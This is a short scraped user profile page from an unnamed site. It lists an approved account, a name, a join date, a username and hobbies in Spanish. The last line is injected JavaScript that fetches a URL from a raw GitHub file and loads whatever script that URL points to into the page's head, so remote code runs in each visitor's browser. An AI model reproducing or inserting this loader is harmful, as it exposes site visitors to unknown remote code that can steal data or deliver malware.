This user account status is Approved
This user has not added any information to their profile yet.
Sara Sofia
Aranguren Gutierrez
Joined 2021-08-14
saranguren
No
3186082391
Cantar, Dibujar, Escribir y Diseñar
;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});